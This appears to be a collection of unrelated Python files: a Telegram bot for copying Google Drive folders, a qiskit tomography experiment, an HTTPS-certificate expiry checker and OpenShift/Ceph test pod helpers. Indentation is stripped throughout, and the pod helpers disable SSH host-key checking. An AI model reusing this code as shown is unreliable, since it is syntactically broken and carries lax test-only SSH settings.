# The session blocks until an error occurs.
self.run_session()
# Remember the first time a backoff sequence starts.
now = datetime.now()
if tries == 0:
self.logs.debug('Starting first backoff sequence.')
backoff_start = now
# Reset the backoff sequence if the last error was long ago.
if (now - backoff_start).total_seconds() > BACKOFF_RESET_S:
self.logs.debug('Starting new backoff sequence.')
tries = 0
backoff_start = now
# Give up after the maximum number of tries.
if tries >= MAX_TRIES:
self.logs.warn('Exceeded maximum retry count.')
break
# Wait according to the progression of the backoff sequence.
self.backoff(tries)
# Increment the number of tries for the next error.
tries += 1
if __name__ == '__main__':
monitor = Monitor()
monitor.start()
try:
Main().run()
finally:
monitor.stop()
|
iCopy.py
|
import time, logging, re, chardet
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from telegram.ext.dispatcher import run_async
import utils
from utils import (
folder_name,
sendmsg,
restricted,
menu_keyboard,
run,
start_message,
help_message,
mode_message,
task_message,
cplt_message,
pros_message,
cron_task,
killmission,
kill_message,
Mission_Done,
Mission_kill,
kill_message_info
)
from drive import drive_get
from threading import Timer, Thread
import settings
from process_bar import status
# ############################## Program Description ##############################
# Latest Modified DateTime : 202006271300 ,
# Version = '0.1.6',
# Author : 'FxxkrLab',
# Website: 'https://bbs.jsu.net/c/official-project/icopy/6',
# Code_URL : 'https://github.com/fxxkrlab/iCopy',
# Description= 'Copy GoogleDrive Resources via Telegram BOT',
# Programming Language : Python3',
# License : MIT License',
# Operating System : Linux',
# ############################## Program Description.END ###########################
# ############################## logging ##############################
# Logging.basicConfig()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO,
)
logger = logging.getLogger(__name__)
# ############################## Global ##############################
# Conversation Stats
CHOOSE_MODE, LINK_REPLY, TARGET_REPLY = range(3)
# Regex
regex = r"[-\w]{11,}"
# ############################## Command ##############################
# START INFO & InlineKeyboard with Callback_query.data
@restricted
def start(update, context):
update.effective_message.reply_text(
start_message().format(update.effective_user.first_name),
reply_markup=menu_keyboard(),
)
return CHOOSE_MODE
# HELP: guidance and usage hints for the help command
@restricted
def help(update, context):
update.effective_message.reply_text(help_message())
# ############################## Run_Modes ##############################
# QUICK Mode ,set mode = quick
@restricted
def quick(update, context):
global mode
mode = "quick"
call_mode = update.effective_message.text
if "/quick" == call_mode.strip()[:6]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
if update.callback_query.data == "quick":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
# COPY Mode ,set mode = copy
@restricted
def copy(update, context):
global mode
mode = "copy"
call_mode = update.effective_message.text
if "/copy" == call_mode.strip()[:5]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
if update.callback_query.data == "copy":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
# ############################## Run_Modes.END ##############################
# Error module
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
# cancel function
def cancel(update, context):
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
"Bye! {} , 欢迎再次使用 iCopy".format(update.message.from_user.first_name)
)
return ConversationHandler.END
# kill function
def kill(update, context):
Thread(target=killmission).start()
return cancel(update, context)
# ################################ Service #################################
# Request GoogleDrive Shared_Link
def request_link(update, context):
update.effective_message.reply_text("请输入 Google Drive 分享链接")
return LINK_REPLY
# Get Shared_link & request Target_Link
def request_target(update, context):
global mode
global link
link = update.effective_message.text
if "/cancel" == link.strip()[:7]:
return cancel(update, context)
if "quick" == mode:
return recived_mission(update, context)
if "copy" == mode:
update.effective_message.reply_text("请输入转入目标文件夹链接 ")
return TARGET_REPLY
# Get Target_Link(also include Shared_link) & run command judged from mode
def recived_mission(update, context):
global mode
global link
global target
target = update.effective_message.text
if "/cancel" == target.strip()[:7]:
return cancel(update, context)
# extract lid,tid from Link(shared & Target)
lid = "".join(re.findall(regex, link))
tid = "".join(re.findall(regex, target))
# extract Shared_Link folderName
if len(lid) == 28 or len(lid) == 33:
foldername = folder_name(settings.Remote, lid, lid)
else:
d_id = lid
foldername = drive_get(d_id)['name']
# get Target_folderName under quick mode
if "quick" == mode:
# tid = Pre_Dst_id under quick mode
tid = settings.Pre_Dst_id
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
else:
d_id = tid
target_folder = drive_get(d_id)['name']
# get Target_folderName under copy mode
elif "copy" == mode:
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
else:
d_id = tid
target_folder = drive_get(d_id)['name']
# sendmsg Mission.INFO
update.effective_message.reply_text(
task_message().format(foldername, lid, target_folder, foldername)
)
# Build Mission Command
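# The template below joins the parts with the literal marker "' JSUSPLIT '"
# and is then split on that marker again, producing an argv-style list roughly
# of the form [Clone, 'copy', 'Remote:{source_id}', 'Remote:{target_id}/folder_name', Run_Mode, TRANSFER].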
commandstr = """{}' JSUSPLIT 'copy' JSUSPLIT '{}:{{{}}}' JSUSPLIT '{}:{{{}}}/{}' JSUSPLIT '{}' JSUSPLIT '{}""".format(
settings.Clone,
settings.Remote,
lid,
settings.Remote,
tid,
foldername,
settings.Run_Mode,
settings.TRANSFER,
)
command = commandstr.split("' JSUSPLIT '")
#print(command)
return ConversationHandler.END, copyprocess(update, context, command)
# Reads and processes task progress output, and pushes rolling status updates to the BOT interface asynchronously
@run_async
def copyprocess(update, context, command):
bot = context.bot
message = update.effective_message.reply_text("转存任务准备中...")
mid = message.message_id
percent = ""
percent1 = ""
working = ""
working1 = ""
prog = ""
timeout = 0.1
xtime = 0
for toutput in run(command):
print(toutput.decode("utf-8", "ignore"))
y = re.findall("^Transferred:", toutput.decode("utf-8", "ignore"))
z = re.findall("^ * ", toutput.decode("utf-8", "ignore"))
if y:
val = str(toutput.decode("utf-8", "ignore"))
val = val.split(",")
percent = str(val[1])
statu = val[1].replace("%", "")
if statu != " -":
statu = int(statu)
prog = status(statu)
if z:
working = str(
toutput.decode("utf-8", "ignore").lstrip("* ").rsplit(":", 2)[0]
)
if working1 != working or percent1 != percent:
if int(time.time()) - xtime > timeout:
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
pros_message(),
percent,
prog,
working,
)
percent1 = percent
working1 = working
xtime = time.time()
# Fix Mission INFO
if utils.Mission_Done == "finished":
if utils.Mission_kill != "killed":
percent = "100%"
prog = status(100)
cron_task(
sendmsg, bot, message.chat_id, mid, cplt_message(), percent, prog, ""
)
utils.Mission_Done = ""
return help(update, context)
elif utils.Mission_kill == "killed":
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
kill_message(),
kill_message_info(),
"",
"",
)
utils.Mission_Done = ""
utils.Mission_kill = ""
return help(update, context)
# ############################### Main ####################################
def main():
updater = Updater(settings.TOKEN, use_context=True,)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("start", start),
CommandHandler("quick", quick),
CommandHandler("copy", copy),
],
states={
CHOOSE_MODE: [
# call function which judged via pattern
CallbackQueryHandler(quick, pattern="quick"),
CallbackQueryHandler(copy, pattern="copy"),
],
LINK_REPLY: [
# get Shared_Link states
CallbackQueryHandler(request_target),
MessageHandler(Filters.text, request_target),
],
TARGET_REPLY: [
# get Target_Link states
CallbackQueryHandler(recived_mission),
MessageHandler(Filters.text, recived_mission),
],
},
fallbacks=[CommandHandler("cancel", cancel),],
)
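# /kill is registered in its own handler group (1) so it is handled
# independently of (and before) the conversation handler registered in group 2.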
dp.add_handler(CommandHandler("kill", kill), 1)
dp.add_handler(conv_handler, 2)
dp.add_handler(CommandHandler("help", help))
dp.add_error_handler(error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy Start")
updater.idle()
if __name__ == "__main__":
main()
|
compare_Wchain_sgd_5layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding, qtm.loss
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_wchain(num_layers, num_qubits):
thetas = np.ones(num_layers*num_qubits*4)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_chain: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Wchain_layerd_state,
thetas, num_layers = num_layers)
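# Plain SGD update: thetas <- thetas - learning_rate * grad(loss)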
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Wchain_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Wchain_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writing ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [5]
num_qubits = [2, 3, 4, 5, 6]
t_wchains = []
for i in num_layers:
for j in num_qubits:
t_wchains.append(multiprocessing.Process(target = run_wchain, args=(i, j)))
for t_wchain in t_wchains:
t_wchain.start()
for t_wchain in t_wchains:
t_wchain.join()
print("Done!")
|
certs.py
|
#!/usr/bin/env python
#
# Generic script to get the days left to expire for https certs
#
import argparse
import datetime
import json
import subprocess
import sys
from threading import Thread
#------------------------------------------------------------------------------
# Group
group = 'HTTPS check'
# Description of metrics
description = 'Check validity of HTTPS certificates'
# Hosts to check
hosts = {
# '{{Name of host}}': {{host}},
# ex 'HTTPS days left - google.be': 'google.be',
'HTTPS days left - google.be': 'google.be',
'HTTPS days left - coscale': 'coscale.com',
'HTTPS days left - microsoft': 'microsoft.com',
}
#------------------------------------------------------------------------------
#
# DONT CHANGE ANYTHING BELOW THIS LINE
#
#------------------------------------------------------------------------------
def execute(metricId, host):
try:
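# openssl s_client fetches the server certificate (SNI via -servername) and
# openssl x509 -noout -dates prints its notBefore/notAfter validity lines;
# the notAfter date is parsed below to compute the remaining days.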
output = subprocess.check_output('echo | openssl s_client -showcerts -servername {0} -connect {1}:443 2>/dev/null | openssl x509 -noout -dates 2>/dev/null'.format(host, host), shell=True, universal_newlines=True)
notAfter = output.split('\n')[1].split('=')[1]
days = (datetime.datetime.strptime(notAfter, '%b %d %H:%M:%S %Y %Z') - datetime.datetime.today()).days
except subprocess.CalledProcessError as e:
days = -1
sys.stdout.write('M{0} {1}\n'.format(metricId, days))
def config():
metrics = []
counter = 0
for host in hosts:
metrics.append({
'id': counter,
'datatype': 'DOUBLE',
'name': host,
'description': description,
'groups': group,
'unit': '',
'tags': '',
'calctype': 'Instant'
})
counter += 1
print(json.dumps({
'maxruntime': 5000,
'period': 3600, # Check every hour
'metrics': metrics
}, indent=4))
def data():
datapoints = {}
counter = 0
threads = [None] * len(hosts)
for host in hosts:
threads[counter] = Thread(target = execute, args = (counter, hosts[host], ))
threads[counter].start()
counter += 1
# Wait for all threads to finish
for thread in threads:
thread.join()
#------------------------------------------------------------------------------
# Switch to check in which mode the script is running
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', action='store_true', help='output a JSON object detailing the metrics this script collects')
parser.add_argument('-d', action='store_true', help='output the metrics this script collects')
args = parser.parse_args()
if args.c:
config()
elif args.d:
data()
|
pod.py
|
"""
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from tests import helpers
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed, NonUpgradedImagesFoundError, ResourceWrongStatusException,
TimeoutExpiredError, UnavailableResourceException
)
from ocs_ci.ocs.utils import setup_ceph_toolbox
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.utils import run_cmd, check_timeout_reached, TimeoutSampler
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = '/var/lib/www/html/test'
FEDORA_TEST_FILE = '/mnt/test'
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode='w+', prefix='POD_', delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get('metadata').get('name')
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION, kind=constants.POD,
namespace=self.namespace
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get('status').get('containerStatuses')[0].get('restartCount')
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(FIO_TIMEOUT)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntax like &&, ||, ;, for loops and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get('metadata').get('labels')
def exec_ceph_cmd(self, ceph_cmd, format='json-pretty'):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if 'rook-ceph-tools' not in self.labels.values():
raise CommandFailed(
"Ceph commands can be executed only on toolbox pod"
)
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type='fs'):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == 'block':
return self.pod_data.get('spec').get('containers')[0].get(
'volumeDevices')[0].get('devicePath')
return (
self.pod_data.get(
'spec'
).get('containers')[0].get('volumeMounts')[0].get('mountPath')
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = 'fio'
name = f'test_workload_{work_load}'
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(
name, path, work_load, storage_type, self, jobs
)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self, storage_type, size, io_direction='rw', rw_ratio=75,
jobs=1, runtime=60, depth=4, rate='1m', rate_process='poisson', fio_filename=None, bs='4K'
):
"""
Execute FIO on a pod
This operation will run in the background and will store the results in
'self.fio_thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.fio_thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == 'rw':
self.io_params = templating.load_yaml(
constants.FIO_IO_RW_PARAMS_YAML
)
self.io_params['rwmixread'] = rw_ratio
else:
self.io_params = templating.load_yaml(
constants.FIO_IO_PARAMS_YAML
)
self.io_params['runtime'] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params['size'] = size
if fio_filename:
self.io_params['filename'] = fio_filename
self.io_params['iodepth'] = depth
self.io_params['rate'] = rate
self.io_params['rate_process'] = rate_process
self.io_params['bs'] = bs
self.fio_thread = self.wl_obj.run(**self.io_params)
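# Illustrative usage (a sketch; assumes an existing PVC-backed pod object):
#     pod_obj.run_io(storage_type='fs', size='1G', runtime=120)
#     fio_result = pod_obj.get_fio_results()
#     read_iops = fio_result.get('jobs')[0].get('read').get('iops')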
def run_git_clone(self):
"""
Execute git clone on a pod to simulate a Jenkins user
"""
name = 'test_workload'
work_load = 'jenkins'
wl = workload.WorkLoad(
name=name,
work_load=work_load,
pod=self,
path=self.get_storage_path()
)
assert wl.setup(), "Setup up for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = ' '.join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f"scp -i {authkey} -o \"StrictHostKeyChecking no\""
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f"ssh -i {authkey} -o \"StrictHostKeyChecking no\" {user}@{server} {cmd}"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self):
"""
Get the pod memory size
Returns:
dict: The names of the pod's containers (str) as keys and their memory
size (str) as values
"""
containers = self.pod_data.get('spec').get('containers')
container_names_and_memory = {
container.get('name'): container.get('resources')
.get('limits').get('memory') for container in containers
}
return container_names_and_memory
# Helper functions for Pods
def get_all_pods(
namespace=None, selector=None, selector_label='app',
exclude_selector=False, wait=False
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list) : List of the resource selector to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If True, exclude pods matching the selector instead of selecting them
wait (bool): If True, wait for a fixed period for pods to stabilize before listing them
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of >4 worker nodes node failures automatic failover of pods to
# other nodes will happen.
# So, we are waiting for the pods to come up on new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()['items']
if selector:
if exclude_selector:
pods_new = [
pod for pod in pods if
pod['metadata'].get(
'labels', {}
).get(selector_label) not in selector
]
else:
pods_new = [
pod for pod in pods if
pod['metadata'].get(
'labels', {}
).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
ct_pod_items = ocp_pod_obj.get(
selector='app=rook-ceph-tools'
)['items']
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(
selector='app=rook-ceph-tools'
)['items']
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if ocp_pod_obj.get_resource_status(
pod.get('metadata').get('name')
) == constants.STATUS_RUNNING:
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
def get_csi_provisioner_pod(interface):
"""
Get the provisioner pod based on interface
Returns:
tuple: Names of the two provisioner pods for the given interface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
selector = 'app=csi-rbdplugin-provisioner' if (
interface == constants.CEPHBLOCKPOOL
) else 'app=csi-cephfsplugin-provisioner'
provision_pod_items = ocp_pod_obj.get(
selector=selector
)['items']
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name
)
return provisioner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about the ocs-operator pod in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name='rbd'):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns (List): List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format='json')
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exist, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f"bash -c \"find {file_path}\"")
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get().get('spec').get('containers')[0].get(
'volumeMounts')[0].get('mountPath')
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
Returns:
str: The md5sum of the file
"""
file_path = get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f"bash -c \"md5sum {file_path}\"", out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), (
f"File {file_name} doesn't exists"
)
current_md5sum = cal_md5sum(pod_obj, file_name)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, (
'Data corruption found'
)
logger.info(f"File {file_name} exists and md5sum matches")
return True
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(
f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}"
)
logging.info(
f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}"
)
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f"bash -c \"let i=0; while true; do echo "
f"{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done\"",
timeout=2400
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (
re.search("code 143", str(ex))
):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20, sleep=1, func=check_file_existence,
pod_obj=pod_obj, file_path=test_file
):
if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f'ls -l {os.path.abspath(parent_dir)}',
out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
